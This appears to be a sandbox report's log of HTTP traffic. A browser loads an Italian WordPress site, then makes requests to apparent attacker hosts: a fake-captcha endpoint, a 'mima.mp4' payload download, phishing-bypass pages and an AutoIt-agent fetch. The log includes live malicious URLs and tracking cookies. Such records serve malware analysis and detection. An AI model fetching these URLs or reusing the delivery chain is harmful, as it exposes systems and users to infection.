    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/framework/js/conditional_load/avia_google_maps_front.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /images/core/emoji/14.0.0/svg/2705.svg HTTP/1.1Host: s.w.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide?token=10611.DeDvDEkh2b6Its9xbNfPHxCK1804kA6_zZJVWLPPWz07-944RJ_J0kYNra_afEkwU03UV0CHnydP5no6KoQ54vkblvuIBsG-969Amgl-cxtmyCk1lkokidjPnkQ91qsTV1SpIOp7NPyr1RezhjfwvFpEDIXtlvS0spqHmtROf1O5xs8i-DVaMexQjDa336P2d5ZAuPOBzBztdoOKKJl7_8M1xV-u-PMh4JytiHCpED4%2C.xOk8KZm_JWiARvYJ6YX-7hS6gpY%2C HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yashr=2978277861735921985; yabs-sid=814606481735921986; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; sync_cookie_csrf=962763166fake; yandexuid=5258352291735921983; yuidss=5258352291735921983; i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; yp=1736008390.yu.8563067781735921985; ymex=1738513990.oyu.8563067781735921985#1767457986.yrts.1735921986; sync_cookie_ok=synced
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.22.19-1051x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /metrika/advert.gif HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yashr=2978277861735921985; yabs-sid=814606481735921986; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; sync_cookie_csrf=962763166fake; yandexuid=5258352291735921983; yuidss=5258352291735921983; i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; yp=1736008390.yu.8563067781735921985; ymex=1738513990.oyu.8563067781735921985#1767457986.yrts.1735921986; sync_cookie_ok=synced
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Dettaglio-della-sala-interna-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /images/core/emoji/14.0.0/svg/2705.svg HTTP/1.1Host: s.w.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/1.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/2.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.53-1222x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Vini-italiani-eccellenti-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/3.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/sfondo_cerchi.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.27.20-1222x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.26.09-1222x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/09/MG_4783-67-copia-2.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.22.19-1051x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.05.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Sala-interna1-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Dettaglio-della-sala-interna-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Vini-italiani-eccellenti-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.woff HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.cipassoitalia.itsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.53-1222x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.27.20-1222x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.26.09-1222x630.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Sala-interna1-1500x630.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-32x32.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.05.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-32x32.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984; _ym_isad=2
    Source: global trafficHTTP traffic detected: GET /awjxs.captcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7c HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: solve.jrqr.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /mima.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: t3.awagama.org
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://t3.awagama.org/mima.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t3.awagama.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://t3.awagama.org/mima.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t3.awagama.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://t3.awagama.org/mima.mp4Accept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: t3.awagama.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1User-Agent: AutoItHost: t3.awagama.org
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4 HTTP/1.1Host: t3.awagama.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: t3.awagama.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
